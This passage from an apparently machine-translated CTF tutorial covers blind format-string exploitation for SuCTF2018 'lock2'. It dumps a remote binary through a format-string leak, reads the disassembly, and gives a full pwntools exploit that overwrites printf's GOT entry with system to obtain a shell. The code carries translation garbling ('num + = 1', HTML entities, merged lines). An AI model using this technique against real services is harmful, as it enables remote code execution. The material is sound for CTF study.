num + = 1
continue

return None

def getbinary():

addr = 0x400000

f = open('binary', 'w')

while addr < 0x401000:

data = leak(addr)

if data is None:

f.write('\xff')

addr += 1

elif len (data) == 0:
f.write('\x00')

addr += 1

else:

f.write(data)

addr + = len (data)
f.close()

getbinary()


It should be noted that in the payload, it is necessary to judge whether or not '\n' appears, because this will cause the source program to read only the previous content, and there is no way to leak the memory, so it is necessary to skip such an address.

#### 分析斌ary¶

Use IDA to open the leaked binary, change the program base address, and then simply look at it, you can basically determine the address of the source program main function.

asm seg000:00000000004005F6 push rbp

seg000:00000000004005F7 mov rbp, rsp

seg000:00000000004005FA add rsp, 0FFFFFFFFFFFFFF80h

seg000:00000000004005FE

seg000:00000000004005FE loc_4005FE: ; CODE XREF: seg000:0000000000400639j

seg000:00000000004005FE lea rax, [rbp-80h]

seg000:0000000000400602 mov edx, 80h ; '€'

seg000:0000000000400607 mov rsi, rax

seg000: 000000000040060A mov edi, 0 seg000:000000000040060F mov eax, 0

seg000:0000000000400614 call sub_4004C0

seg000:0000000000400619 lea rax, [rbp-80h]

seg000: 000000000040061D mov rdi, rax seg000:0000000000400620 mov eax, 0

seg000:0000000000400625 call sub_4004B0

seg000:000000000040062A mov rax, cs:601048h

seg000: 0000000000400631 mov rdi, rax seg000:0000000000400634 call near ptr unk_4004E0

seg000:0000000000400639 jmp short loc_4005FE

It can be basically determined that sub\_4004C0 is a read function, because the read function has a total of three parameters, which is basically read. In addition, the sub\_4004B0 called below should be the output function, and then a function should be called again, and then jump back to the read function, the program should be a while 1 loop, always executing.

#### Using ideas

After analyzing the above, we can determine the following basic ideas

- leak the address of the printf function,
- Get the corresponding libc and system function address
- Modify printf address to system function address
- Read /bin/sh; to get the shell

#### Using the program

The procedure is as follows.

python

##coding=utf8

import math

from pwn import *

from LibcSearcher import LibcSearcher

##context.log_level = 'debug'

context.arch = 'amd64'

ip = "127.0.0.1"

port = 9999

def leak(addr):

# leak addr for three times

num = 0
while num < 3:

try:

print 'leak addr: ' + hex(addr)

sh = remote(ip, port)

payload = '%00008$s' + 'STARTEND' + p64(addr) #说明有\n, a new line appears if '\x0a' in payload: return None sh.sendline(payload) data = sh.recvuntil('STARTEND', drop=True) sh.close() return data except Exception: num + = 1 continue return None def getbinary(): addr = 0x400000 f = open('binary', 'w') while addr < 0x401000: data = leak(addr) if data is None: f.write('\xff') addr += 1 elif len (data) == 0: f.write('\x00') addr += 1 else: f.write(data) addr + = len (data) f.close() ##getbinary() read_got = 0x601020 printf_got = 0x601018 sh = remote(ip, port) ## let the read get resolved sh.sendline('a') sh.recv() ## get printf addr payload = '%00008$s' + 'STARTEND' + p64(read_got)

sh.sendline(payload)

data = sh.recvuntil (&#39;STARTEND&#39;, drop = True) .ljust (8, &#39;x00&#39;)
sh.recv()

read_addr = u64(data)

## get system addr

libc = LibcSearcher('read', read_addr)

libc_base = read_addr - libc.dump('read')

system_addr = libc_base + libc.dump('system')

log.success('system addr: ' + hex(system_addr))

log.success('read   addr: ' + hex(read_addr))

## modify printf_got

payload = fmtstr_payload(6, {printf_got: system_addr}, 0, write_size='short')

## get all the addr

addr = payload[:32]

payload = '%32d' + payload[32:]

offset = (int)(math.ceil(len(payload) / 8.0) + 1)

for i in range(6, 10):

old = '%{}$'.format(i) new = '%{}$'.format(offset + i)

payload = payload.replace(old, new)

remainer = len(payload) % 8

payload += (8 - remainer) * 'a'

payload += addr

sh.sendline(payload)

sh.recv()

## get shell

sh.sendline('/bin/sh;')

sh.interactive()


What needs to be noted here is this code.

## modify printf_got

payload = fmtstr_payload(6, {printf_got: system_addr}, 0, write_size='short')

## get all the addr

addr = payload[:32]

payload = '%32d' + payload[32:]

offset = (int)(math.ceil(len(payload) / 8.0) + 1)

for i in range(6, 10):

old = '%{}$'.format(i) new = '%{}$'.format(offset + i)

payload = payload.replace(old, new)

remainer = len(payload) % 8

payload += (8 - remainer) * 'a'

payload += addr

sh.sendline(payload)

sh.recv()


Fmtstr_payload directly get the payload will put the address in front, and this will lead to '\x00' truncation of printf (About this problem, pwntools is currently developing an enhanced version of fmt_payload, it is estimated that it will be developed soon ). So I used some tricks to put it behind. The main idea is to place the address in the 8 byte alignment and modify the offset in the payload. have to be aware of is

offset = (int)(math.ceil(len(payload) / 8.0) + 1)


This line gives the offset of the modified address in the formatted string. The reason for this is that no matter how it is modified, the more characters in the order of '%order\$hn' will not be greater than 8. Specific can be deduced by yourself.

### Title¶

• SuCTF2018 - lock2 (The organizer provided the docker image: suctf/2018-pwn-lock2)